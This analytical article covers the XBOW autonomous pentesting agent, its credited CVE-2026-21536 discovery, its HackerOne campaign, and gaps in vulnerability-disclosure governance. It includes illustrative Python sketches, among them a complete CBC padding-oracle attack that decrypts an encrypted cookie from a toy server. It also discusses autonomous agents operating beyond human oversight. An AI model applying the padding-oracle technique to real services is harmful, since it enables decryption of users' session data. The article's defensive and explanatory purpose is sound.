On March 5, 2026, the National Vulnerability Database published CVE-2026-21536, a CVSS 9.8 remote code execution flaw in Microsoft’s Devices Pricing Program (NVD). The discoverer field listed not a human researcher but the XBOW AI agent, an autonomous penetration testing system. Thirteen days later, on March 18, XBOW, the company behind the agent, closed a $120 million Series C at a $1 billion valuation.

Between those two dates, that same XBOW AI agent climbed to the #1 position on HackerOne’s entire U.S. bug bounty leaderboard, outranking every human security researcher on the platform. No Google Project Zero engineer is credited with identifying this flaw. Microsoft’s own security team missed it. An autonomous system operating without source code access found a vulnerability vector the entire human research community had walked past.

A 9.8 Without Authentication

CVE-2026-21536 is a CWE-434 flaw (unrestricted upload of a file with a dangerous type) in Microsoft’s Devices Pricing Program. Its CVSS v3.1 vector reads AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H: network-accessible, low attack complexity, no privileges required, no user interaction needed, and high impact across confidentiality, integrity, and availability. A remote attacker could upload executable files that the system would process without validation, achieving full code execution on Microsoft’s infrastructure.
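The 9.8 follows mechanically from that vector. The sketch below implements the base-score equations and the `Roundup` helper from FIRST’s CVSS v3.1 specification, covering base metrics only; the function name `cvss31_base_score` is illustrative, not an NVD or FIRST API.

```python
import math

# CVSS v3.1 base-metric weights, as listed in the FIRST specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.20}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.50}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """Round up to one decimal place, per the v3.1 Roundup definition."""
    int_input = round(value * 100_000)
    if int_input % 10_000 == 0:
        return int_input / 100_000.0
    return (math.floor(int_input / 10_000) + 1) / 10.0


def cvss31_base_score(vector: str) -> float:
    """Compute the base score from a vector such as 'AV:N/AC:L/...'."""
    m = dict(part.split(":") for part in vector.split("/"))
    changed = m["S"] == "C"
    # Impact sub-score: combined C/I/A impact, adjusted for scope.
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    # Privileges Required is weighted differently when scope changes.
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr * UI[m["UI"]]
    if impact <= 0:
        return 0.0
    if changed:
        return roundup(min(1.08 * (impact + exploitability), 10))
    return roundup(min(impact + exploitability, 10))


print(cvss31_base_score("AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"))  # 9.8
```

With every exploitability metric at its most permissive value and full C/I/A impact, the unrounded sum is about 9.76, which `Roundup` lifts to 9.8.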

Microsoft remediated the flaw server-side within its cloud infrastructure before the March 10 Patch Tuesday cycle. No customer action was required. CrowdStrike’s March 2026 analysis catalogued 16 remote code execution patches that month; CVE-2026-21536 carried the highest severity score among them.

What sets this CVE apart from the rest of March’s patch cycle is not the severity class. It is the discoverer: an AI system probing attack surfaces at machine speed, locating what human researchers had examined and dismissed. But the single CVE only hints at the scale of what XBOW’s system was doing simultaneously across the open internet.

90 Days, 1,060 Autonomous Attacks



XBOW’s ascent on HackerOne was not a single lucky find. Over 90 days, XBOW’s system submitted 1,060 vulnerability reports produced by autonomous attack campaigns. Averaged over the full window, assuming continuous runtime, that is one submission roughly every 122 minutes, around the clock. Of those submissions, 54 were rated critical and 242 high severity. At the time of reporting, 130 had been resolved by affected programs; hundreds more were flagged as duplicates or remained in triage queues.
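The 122-minute average and the severity mix reduce to simple arithmetic on the reported figures. This sketch assumes the 90 days ran continuously and that submissions were spread evenly, which the self-reported data does not state.

```python
# Figures as reported (XBOW self-reported, 90-day HackerOne campaign).
DAYS = 90
SUBMISSIONS = 1_060
CRITICAL, HIGH, RESOLVED = 54, 242, 130

window_minutes = DAYS * 24 * 60              # 129,600 minutes
avg_interval = window_minutes / SUBMISSIONS  # assumes an even, round-the-clock spread


def share(count: int) -> float:
    """Percentage of all submissions, rounded to one decimal place."""
    return round(100 * count / SUBMISSIONS, 1)


print(f"one submission every {avg_interval:.0f} minutes")
# one submission every 122 minutes
print(f"critical {share(CRITICAL)}%, high {share(HIGH)}%, resolved {share(RESOLVED)}%")
# critical 5.1%, high 22.8%, resolved 12.3%
```

Roughly 28% of submissions were rated critical or high, while only about one in eight had been resolved when the figures were published.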

XBOW’s architecture, described in the company’s technical breakdown, operates through a coordinator-solver model: a central coordinator oversees each campaign and spawns multiple independent “solvers,” individual AI pentesters, each operating in an isolated attack machine environment. Human involvement bookends the process at launch and validation, but discovery, exploitation, and documentation are autonomous.
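The coordinator-solver pattern can be illustrated with Python’s `concurrent.futures.ThreadPoolExecutor`. This is a hypothetical sketch, not XBOW’s code. `SolverResult`, `run_solver`, and `coordinate` are invented names. Each solver here is a plain function with a toy vulnerability rule rather than an AI agent, and per-solver local state stands in for an isolated attack machine.

```python
from concurrent.futures import ThreadPoolExecutor
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class SolverResult:
    """What one solver reports back to the coordinator."""
    solver_id: int
    target: str
    finding: Optional[str]  # None: the solver abandoned this path
    steps: List[str] = field(default_factory=list)


def run_solver(solver_id: int, target: str, technique: str) -> SolverResult:
    # Hypothetical solver: keeps only local state (a stand-in for an isolated
    # attack machine) and tries one technique against one target.
    steps = [f"recon {target}", f"try {technique}"]
    # Toy rule standing in for real exploitation logic.
    vulnerable = technique == "path-traversal" and target.endswith("/download")
    finding = f"{technique} at {target}" if vulnerable else None
    return SolverResult(solver_id, target, finding, steps)


def coordinate(targets: List[str], techniques: List[str], max_workers: int = 4) -> List[SolverResult]:
    """Coordinator: spawn one solver per (target, technique) pair and gather results."""
    jobs = [(t, tech) for t in targets for tech in techniques]
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        futures = [pool.submit(run_solver, i, t, tech) for i, (t, tech) in enumerate(jobs)]
        return [f.result() for f in futures]


results = coordinate(
    ["https://app.example/login", "https://app.example/download"],
    ["sqli", "path-traversal", "ssrf"],
)
findings = [r.finding for r in results if r.finding]
print(findings)  # ['path-traversal at https://app.example/download']
```

In this sketch, the coordinator never sees how a solver reached its result. It only collects the returned records. That is the same boundary that later limits what an audit trail can show.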

Vulnerability classes spanned SQL injection, XXE (XML External Entities), SSRF (Server-Side Request Forgery), and path traversal, alongside multi-stage exploits requiring chained reasoning. In one documented case, the system executed a 48-step exploit chain, escalating a low-severity blind SSRF through successive stages involving malicious image files and GDAL parsing exploitation. In another, it decrypted an AES-128 protected cookie in 17.5 minutes by iteratively analyzing server error responses, a side-channel technique that would occupy a skilled pentester for hours.
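The source does not name the technique behind the cookie decryption. The classic attack that fits “iteratively analyzing server error responses” against a block-encrypted cookie is a CBC padding oracle, and the sketch below assumes that is what happened. Python’s standard library has no AES, so a deliberately insecure XOR permutation stands in for AES-128. The attack never looks inside the cipher. It only asks whether the server reports bad padding. `ToyServer` and all helper names are hypothetical.

```python
import os

BLOCK = 16  # AES-128 block size in bytes


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def toy_cipher(key: bytes, block: bytes) -> bytes:
    # Stand-in for AES-128 (insecure!): XOR with the key is its own inverse.
    # The padding-oracle attack treats the cipher as a black box, so this suffices.
    return xor(key, block)


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_valid(data: bytes) -> bool:
    n = data[-1]
    return 1 <= n <= BLOCK and data[-n:] == bytes([n]) * n


class ToyServer:
    """Hypothetical server that issues CBC-encrypted cookies and leaks padding errors."""

    def __init__(self) -> None:
        self.key = os.urandom(BLOCK)

    def issue_cookie(self, plaintext: bytes) -> bytes:
        prev = os.urandom(BLOCK)  # random IV, sent as the first block
        out = [prev]
        padded = pkcs7_pad(plaintext)
        for i in range(0, len(padded), BLOCK):
            prev = toy_cipher(self.key, xor(padded[i:i + BLOCK], prev))
            out.append(prev)
        return b"".join(out)

    def padding_ok(self, cookie: bytes) -> bool:
        # The side channel: "bad padding" is distinguishable from other errors.
        blocks = [cookie[i:i + BLOCK] for i in range(0, len(cookie), BLOCK)]
        plain = b"".join(xor(toy_cipher(self.key, c), p) for p, c in zip(blocks, blocks[1:]))
        return pkcs7_valid(plain)


def recover_block(oracle, prev: bytes, target: bytes) -> bytes:
    """Recover one plaintext block by forging the preceding block byte by byte."""
    inter = bytearray(BLOCK)  # decrypted-but-not-yet-XORed bytes of `target`
    for pad in range(1, BLOCK + 1):
        pos = BLOCK - pad
        for guess in range(256):
            forged = bytearray(BLOCK)
            forged[pos] = guess
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ pad  # force already-known bytes to `pad`
            if not oracle(bytes(forged) + target):
                continue
            if pad == 1:
                forged[pos - 1] ^= 0xFF  # rule out an accidental \x02\x02 ending
                if not oracle(bytes(forged) + target):
                    continue
            inter[pos] = guess ^ pad
            break
    return xor(inter, prev)


def padding_oracle_decrypt(oracle, cookie: bytes) -> bytes:
    blocks = [cookie[i:i + BLOCK] for i in range(0, len(cookie), BLOCK)]
    plain = b"".join(recover_block(oracle, p, c) for p, c in zip(blocks, blocks[1:]))
    return plain[:-plain[-1]]  # strip PKCS#7 padding


server = ToyServer()
cookie = server.issue_cookie(b"user=alice;role=admin")
print(padding_oracle_decrypt(server.padding_ok, cookie))  # b'user=alice;role=admin'
```

Each block costs at most about 256 × 16 oracle queries. That bounded, mechanical search is why the attack suits an automated agent far better than a human working by hand.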

“All findings were fully automated,” the company’s technical report states. “Humans reviewed them before submission for compliance; they did not participate in discovery or exploitation.” Discovery at this velocity is no longer a human activity. Whether the governance architecture can keep pace with the hunt is a separate question, and the answer is already visible.

The 28-Minute Paradox



Speed is where the narrative fractures. XBOW’s system matched a principal pentester’s 40-hour manual assessment in 28 minutes. The ratio is worth making explicit: 2,400 minutes of expert labor compressed into less than half an hour, an 85.7x speed advantage. That is not an incremental improvement. When a single autonomous instance completes an entire security assessment before a triage team finishes its morning standup, the governance architecture around vulnerability disclosure becomes retrospective rather than preventive.
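The 85.7x figure is a single division of the two published durations. It assumes the manual and automated assessments covered comparable scope, which the figures alone do not establish.

```latex
\[
\text{speedup} = \frac{40\ \text{h} \times 60\ \text{min/h}}{28\ \text{min}}
              = \frac{2400}{28} \approx 85.7
\]
```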

What the CVE credit and the HackerOne ranking reveal in combination amounts to a “28-Minute Paradox”: the speed that makes autonomous vulnerability discovery indispensable for defense is the same speed that renders existing governance frameworks decorative. Bug bounty programs, responsible disclosure timelines, and audit processes were all designed for human tempo: a researcher identifies a flaw, documents it across days, submits it through a portal, and awaits triage. Previous analysis of AI agent identity security found that 60% of organizations cannot reliably stop autonomous agents from escalating beyond intended scope. The 28-Minute Paradox extends that governance gap from the defensive side to the offensive: if the agent hunting vulnerabilities operates faster than the humans governing it, oversight exists only as a post-hoc record of already-completed decisions.

“Although Microsoft has already patched and mitigated the vulnerability, it highlights a shift toward AI-driven discovery of complex vulnerabilities at increasing speed,” said Ben McCarthy, lead cyber security engineer at Immersive Labs. The phrasing is measured. The vector it describes is exponential.

XBOW AI Agent: The Billion-Dollar Signal

XBOW’s $120 million round, first reported by Bloomberg, brought DFJ Growth, Northzone, Sequoia Capital, Alkeon Capital, and Altimeter to the cap table, pushing total capital raised to $237 million across three rounds. Founded in January 2024 by Oege de Moor (creator of GitHub Copilot and GitHub Advanced Security), the company reached unicorn status in 26 months.

“XBOW reached the top of the HackerOne leaderboard and is now deployed at some of the most security-forward companies in the world,” said de Moor in the funding announcement. Venture capital is not pricing XBOW as an AI-assisted security tool. At $1 billion, investors are valuing autonomous AI penetration testing as a standalone market category, one where machines perform the assessment and humans validate the output. An original calculation from the disclosed figures sharpens the bet: $237 million invested against 54 critical vulnerabilities discovered. That ratio yields approximately $4.39 million per critical finding, expensive at startup scale but trivial compared to the remediation cost of a single exploited CVSS 9.8 vulnerability reaching production systems.
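The per-finding figure is a single division, but note what it mixes. The numerator is capital raised across all three rounds since 2024. The denominator counts critical findings from one 90-day HackerOne campaign. The result is a rough framing device, not a unit cost.

```latex
\[
\frac{\$237\,\text{M raised}}{54\ \text{critical findings}} \approx \$4.39\,\text{M per critical finding}
\]
```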

The Counterargument That Holds (To a Point)

Ben McCarthy’s assessment captures the strongest defense of autonomous vulnerability discovery. Autonomous systems that identify CVSS 9.8 flaws before adversaries do are, by any defensive metric, net positive. Reasonable cybersecurity professionals hold this view because the alternative (critical vulnerabilities sitting undiscovered until a malicious actor reaches them) carries catastrophic consequences that no governance framework prevents.

XBOW’s architecture partially addresses the governance concern. The company states its validation logic is deterministic, with reproducible exploits required before any finding ships: “if it can’t be proven, it doesn’t ship.” Every submitted report includes the actual exploit chain as evidence, creating a verifiable trail for confirmed findings.
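XBOW has not published its gate’s implementation. The sketch below only illustrates the stated rule, “if it can’t be proven, it doesn’t ship,” under assumptions. `Finding`, `validation_gate`, and the choice of three replays are hypothetical. A finding passes only if its exploit succeeds on every replay.

```python
from dataclasses import dataclass
from typing import Callable


@dataclass
class Finding:
    title: str
    exploit: Callable[[], bool]  # replays the exploit; True if it succeeded


def validation_gate(finding: Finding, replays: int = 3) -> bool:
    """Ship only if the exploit reproduces on every replay; otherwise drop it."""
    return all(finding.exploit() for _ in range(replays))


confirmed = Finding("path traversal in /download", exploit=lambda: True)
attempts = iter([True, False, True])  # simulated non-deterministic exploit
flaky = Finding("suspected SSRF", exploit=lambda: next(attempts))
print(validation_gate(confirmed), validation_gate(flaky))  # True False
```

The gate only ever sees findings that already made it to the reporting stage. Nothing in it records the paths the agent abandoned earlier.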

But deterministic validation describes what the system does with the findings it reports. It reveals nothing about reconnaissance activity, abandoned attack paths, or endpoints probed without flagging results. The audit trail records successful hunts. What happens in the average 122 minutes between submissions (the failed probes, the discarded vectors, the infrastructure touched and released) falls outside the observable record. When AI vulnerability scanners found 11,353 bugs in 30 days, the industry celebrated the detection numbers. Nobody asked what the scanner touched and discarded on its way to those findings.
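Closing that gap means logging every probe, not just every finding. The sketch below writes one JSON object per line (JSON Lines) for each attempt, whatever its outcome. The `ActivityLog` class, its field names, and the outcome labels are hypothetical and do not reflect any vendor’s schema.

```python
import json
import os
import tempfile
import time
from typing import Dict, Optional


class ActivityLog:
    """Append-only record of every probe, not just the ones that became findings."""

    def __init__(self, path: str) -> None:
        self.path = path

    def record(self, target: str, technique: str, outcome: str,
               finding: Optional[str] = None) -> None:
        entry = {"ts": time.time(), "target": target, "technique": technique,
                 "outcome": outcome, "finding": finding}
        with open(self.path, "a", encoding="utf-8") as fh:
            fh.write(json.dumps(entry) + "\n")  # one JSON object per line

    def footprint(self) -> Dict[str, int]:
        """Count probes by outcome: the reconnaissance footprint."""
        counts: Dict[str, int] = {}
        with open(self.path, encoding="utf-8") as fh:
            for line in fh:
                outcome = json.loads(line)["outcome"]
                counts[outcome] = counts.get(outcome, 0) + 1
        return counts


log = ActivityLog(os.path.join(tempfile.mkdtemp(), "agent-activity.jsonl"))
log.record("https://app.example/login", "sqli", "abandoned")
log.record("https://app.example/upload", "file-upload", "abandoned")
log.record("https://app.example/download", "path-traversal", "reported", "path traversal")
print(log.footprint())  # {'abandoned': 2, 'reported': 1}
```

In this toy run, two of the three probes never become findings, so an outcome-only trail would omit them entirely.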

For CISOs, the implication is immediate: audit bug bounty program terms. For penetration testing firms, the 85.7x speed differential raises a procurement question their clients will ask within months. For bug bounty platforms, XBOW’s ranking forces a structural decision: when AI agents dominate the leaderboard, the platform’s value proposition to human hunters erodes.

All figures cited above rely on XBOW’s self-reported campaign data and HackerOne’s publicly visible leaderboard position.

Three Measures Before the Next Autonomous Agent Arrives

- Audit program terms for AI eligibility. Most HackerOne and Bugcrowd programs were drafted when the submitter was assumed to be human. Review whether terms address automated submissions, payout eligibility for non-human reporters, and rate limits on programmatic report generation. XBOW holds the #1 position now, and with venture capital treating autonomous pentesting as a standalone category, competing agents are likely already in development.

- Build triage capacity for machine-speed submissions. XBOW’s 1,060 reports in 90 days, with hundreds still awaiting resolution, preview the incoming volume. When a single Patch Tuesday cycle already delivers 16 RCE patches to assess, autonomous agent output compounds the backlog. Triage teams sized for human submission rates risk being overwhelmed within months. Establish automated pre-triage filters and severity-based routing before the queue exceeds manual capacity.

- Demand observability into abandoned attack paths. Evidence chains for reported findings are necessary but insufficient. Governance requires visibility into what the agent probed and discarded: the reconnaissance footprint, not just the results. Research indicating that 60% of organizations cannot reliably constrain autonomous agents from escalating beyond intended scope underscores the urgency. Any vendor claiming complete audit coverage without logging failed attempts is describing a record of outcomes, not a record of activity.
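A pre-triage filter with severity-based routing might look like the sketch below. This is an assumption-laden illustration, not a feature of HackerOne or Bugcrowd. `Report`, `pre_triage`, the fingerprint scheme (normalized endpoint plus vulnerability class), and the queue names are all hypothetical. Reports are sorted by severity first, so when duplicates collide, the highest-severity copy is the one kept.

```python
from dataclasses import dataclass
from typing import Dict, List

SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3, "none": 4}


@dataclass
class Report:
    report_id: int
    severity: str
    has_reproducible_poc: bool
    fingerprint: str  # hypothetical: normalized endpoint + vulnerability class


def pre_triage(reports: List[Report]) -> Dict[str, List[int]]:
    """Drop duplicates and unproven reports, then route the rest by severity."""
    seen = set()
    queues: Dict[str, List[int]] = {"urgent": [], "standard": [], "rejected": []}
    # Stable sort: highest severity first, so it wins any duplicate collision.
    for r in sorted(reports, key=lambda r: SEVERITY_ORDER[r.severity]):
        if r.fingerprint in seen or not r.has_reproducible_poc:
            queues["rejected"].append(r.report_id)
            continue
        seen.add(r.fingerprint)
        queue = "urgent" if r.severity in ("critical", "high") else "standard"
        queues[queue].append(r.report_id)
    return queues


reports = [
    Report(1, "high", True, "GET /download|path-traversal"),
    Report(2, "critical", True, "POST /upload|unrestricted-upload"),
    Report(3, "high", True, "GET /download|path-traversal"),  # duplicate of 1
    Report(4, "low", False, "GET /search|xss"),               # no proof of concept
    Report(5, "medium", True, "GET /api|ssrf"),
]
print(pre_triage(reports))
# {'urgent': [2, 1], 'standard': [5], 'rejected': [3, 4]}
```

Requiring a reproducible proof of concept at intake mirrors the evidence-chain requirement described earlier. Rejected reports stay listed rather than silently dropped, so humans can still audit them.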

Failing to adapt carries a calculable cost. Each day a critical vulnerability sits unresolved in a triage backlog extends the exposure window for infrastructure that an autonomous agent has already mapped. Organizations that wait for platforms to define AI submission rules, rather than proactively writing their own, cede governance to systems that operate at an 85.7x speed advantage over the humans meant to oversee them.

By September 2026, expect at least three autonomous AI agents to hold positions in HackerOne’s top 20 U.S. leaderboard, and at least one major platform to publish formal rules governing non-human submissions. Those rules will arrive after the fact, drafted to govern systems that already operate 85.7x faster than the review processes checking them. XBOW’s 28-minute assessment against a pentester’s 40-hour standard is already the benchmark. The governance architecture to audit what happens in those 28 minutes has yet to be started.

References

- NVD: CVE-2026-21536 (CVSS 9.8 score, CWE-434 classification, attack vector breakdown)

- Bloomberg: XBOW Raises $120M at $1B Valuation (initial funding report, valuation confirmation)

- Krebs on Security: Microsoft Patch Tuesday, March 2026 (Patch Tuesday context, Ben McCarthy quote on AI-driven discovery)

- SiliconANGLE: XBOW Raises $120M (Series C details, $1B valuation, AES-128 decryption benchmark)

- XBOW Blog: How XBOW Reached #1 (48-step exploit chain methodology, deterministic validation gate)

- XBOW Blog: 1,060 Autonomous Attacks (90-day campaign statistics, fully automated discovery methodology)

- TechRepublic: XBOW Tops HackerOne U.S. Leaderboard (ranking achievement, severity breakdown of 1,060 findings)

- BusinessWire: XBOW Press Release (CEO statement, investor roster, $237M total raised, 28-minute benchmark)

- CrowdStrike: March 2026 Patch Tuesday Analysis (vulnerability type distribution, 16 RCE patches in March cycle)

- Sequoia Capital: Oege de Moor Interview (XBOW founding timeline, CEO background)